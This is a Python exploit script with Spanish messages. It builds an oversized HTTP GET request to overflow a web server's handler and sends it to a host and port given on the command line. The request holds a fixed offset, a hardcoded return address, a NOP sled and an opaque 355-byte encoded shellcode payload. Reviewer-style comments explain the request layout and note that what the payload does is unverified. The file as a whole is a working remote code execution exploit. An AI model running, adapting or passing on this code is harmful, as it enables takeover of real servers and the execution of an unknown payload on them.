import socket
import sys
from time import sleep
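# Command-line parsing happens at import time; `host` and `puerto` are read by
# the `__main__` block further down.  Only the errors a bad command line can
# raise are trapped: IndexError (argument missing) and ValueError (port is not
# a number).  A bare `except:` here would also swallow SystemExit and
# KeyboardInterrupt and hide real problems.
try:
    host = sys.argv[1]
    # Validate the port here so a typo is reported as a usage error instead of
    # a generic failure at connect time.  `int(puerto)` downstream still works.
    puerto = int(sys.argv[2])
    if not 0 < puerto < 65536:
        raise ValueError(puerto)
except (IndexError, ValueError):
    # Usage text kept verbatim (runtime output).  Exit status 1 marks the
    # failure for wrapping scripts; a usage error should not exit with 0.
    print("[*]USO python2 {} <Direccion IP> <Puerto> ".format(sys.argv[0]))
    sys.exit(1)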
# Opaque 355-byte payload (23 lines of 15 bytes plus 10 on the last line); it
# is sent verbatim after the NOP sled in the request built in the main block.
# Nothing in this file records how it was generated or what it does (bind or
# reverse shell? which IP/port is baked in?), so that cannot be read off the
# source.
# NOTE(review): the leading bytes look like the decoder stub of an encoded
# payload rather than plain shellcode — `\xd9\x74\x24\xf4` decodes to
# `fnstenv [esp-0xc]` (the FPU GetPC trick), preceded by an FPU opcode and a
# `mov ebp, imm32` key, and followed by `pop eax` / `mov cl, 0x53` — the shape
# of an x86 shikata_ga_nai-style decoder.  TODO confirm by decoding it in a
# disassembler or an isolated sandbox before pointing this at anything; a blob
# copied from a public repo must not be trusted until its behaviour is verified.
# Python 2 `str` is bytes, so each \x escape is exactly one payload byte; on
# Python 3 this literal is text and has to be encoded latin-1 before sending.
shellcode = ("\xdb\xde\xbd\x74\xf9\x07\x95\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x53\x83\xc0\x04\x31\x68\x13\x03\x1c\xea\xe5\x60\x20\xe4\x68"
"\x8a\xd8\xf5\x0c\x02\x3d\xc4\x0c\x70\x36\x77\xbd\xf2\x1a\x74"
"\x36\x56\x8e\x0f\x3a\x7f\xa1\xb8\xf1\x59\x8c\x39\xa9\x9a\x8f"
"\xb9\xb0\xce\x6f\x83\x7a\x03\x6e\xc4\x67\xee\x22\x9d\xec\x5d"
"\xd2\xaa\xb9\x5d\x59\xe0\x2c\xe6\xbe\xb1\x4f\xc7\x11\xc9\x09"
"\xc7\x90\x1e\x22\x4e\x8a\x43\x0f\x18\x21\xb7\xfb\x9b\xe3\x89"
"\x04\x37\xca\x25\xf7\x49\x0b\x81\xe8\x3f\x65\xf1\x95\x47\xb2"
"\x8b\x41\xcd\x20\x2b\x01\x75\x8c\xcd\xc6\xe0\x47\xc1\xa3\x67"
"\x0f\xc6\x32\xab\x24\xf2\xbf\x4a\xea\x72\xfb\x68\x2e\xde\x5f"
"\x10\x77\xba\x0e\x2d\x67\x65\xee\x8b\xec\x88\xfb\xa1\xaf\xc4"
"\xc8\x8b\x4f\x15\x47\x9b\x3c\x27\xc8\x37\xaa\x0b\x81\x91\x2d"
"\x6b\xb8\x66\xa1\x92\x43\x97\xe8\x50\x17\xc7\x82\x71\x18\x8c"
"\x52\x7d\xcd\x39\x5a\xd8\xbe\x5f\xa7\x9a\x6e\xe0\x07\x73\x65"
"\xef\x78\x63\x86\x25\x11\x0c\x7b\xc6\x0c\x91\xf2\x20\x44\x39"
"\x53\xfa\xf0\xfb\x80\x33\x67\x03\xe3\x6b\x0f\x4c\xe5\xac\x30"
"\x4d\x23\x9b\xa6\xc6\x20\x1f\xd7\xd8\x6c\x37\x80\x4f\xfa\xd6"
"\xe3\xee\xfb\xf2\x93\x93\x6e\x99\x63\xdd\x92\x36\x34\x8a\x65"
"\x4f\xd0\x26\xdf\xf9\xc6\xba\xb9\xc2\x42\x61\x7a\xcc\x4b\xe4"
"\xc6\xea\x5b\x30\xc6\xb6\x0f\xec\x91\x60\xf9\x4a\x48\xc3\x53"
"\x05\x27\x8d\x33\xd0\x0b\x0e\x45\xdd\x41\xf8\xa9\x6c\x3c\xbd"
"\xd6\x41\xa8\x49\xaf\xbf\x48\xb5\x7a\x04\x78\xfc\x26\x2d\x11"
"\x59\xb3\x6f\x7c\x5a\x6e\xb3\x79\xd9\x9a\x4c\x7e\xc1\xef\x49"
"\x3a\x45\x1c\x20\x53\x20\x22\x97\x54\x61")
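def _as_bytes(value):
    """Return `value` as raw bytes.

    On Python 2 a `str` already is bytes and is returned unchanged.  On
    Python 3 a `str` built from `\\x` escapes holds code points 0..255, and
    latin-1 maps each of them to exactly one byte, so the payload is preserved.
    """
    return value if isinstance(value, bytes) else value.encode("latin-1")


def build_request(shellcode, offset=1787, ret_addr=b"\x4a\x75\xd7\x77", nop_sled=20):
    """Build the oversized GET request that overflows the target's handler.

    Layout: ``"GET "`` + ``offset`` filler bytes ``"A"`` + ``ret_addr`` +
    ``nop_sled`` NOPs (``\\x90``) + ``shellcode`` + ``" HTTP/1.1\\r\\n\\r\\n"``.
    The request line carries no ``Host`` header; that is how the original sent
    it and is kept, since changing the request shape could move the overflow.

    Args:
        shellcode: payload, as bytes or as a `str` of ``\\x`` escapes (see
            `_as_bytes`).
        offset: filler length before the saved return address.  1787 was
            measured against the original target build and is not portable.
        ret_addr: 4 bytes written over the saved return address.  The default
            is 0x77d7754a little-endian; presumably a ``jmp esp``-style gadget
            in a non-relocated module of the original target — TODO confirm.
            It is OS/build specific: against another build this most likely
            just crashes the service (a DoS, not code execution).  The
            original source also carried a commented-out second candidate,
            0x76E54E5B, whose byte string there (``\\x5b\\xe4\\x5e\\x76``) was
            not even its little-endian form (``\\x5b\\x4e\\xe5\\x76``); only the
            address above is used.
        nop_sled: number of ``\\x90`` bytes between ``ret_addr`` and the payload.

    Returns:
        bytes (Python 2: `str`) ready to be written to a TCP socket.
    """
    return (b"GET " + b"A" * offset + _as_bytes(ret_addr) + b"\x90" * nop_sled
            + _as_bytes(shellcode) + b" HTTP/1.1\r\n\r\n")


if __name__ == "__main__":
    request = build_request(shellcode)
    try:
        # create_connection resolves `host` (IPv4 or IPv6) and applies the
        # timeout to connect and send, so an unresponsive target cannot hang
        # the script.  sendall() loops until every byte is on the wire, where
        # send() may return after a partial write and silently truncate the
        # payload.  try/finally (not `with`) keeps Python 2 compatibility.
        s = socket.create_connection((host, int(puerto)), timeout=10)
        try:
            s.sendall(request)
        finally:
            s.close()
    except (socket.error, ValueError) as e:
        # socket.error: refused/reset/unreachable/timeout; ValueError: port is
        # not numeric.  Keep the original message but also say what failed,
        # and exit non-zero instead of 0.
        print("Algo ha ido mal")
        sys.stderr.write("[!] {}: {}\n".format(type(e).__name__, e))
        sys.exit(1)
    print("Conectandooooo...")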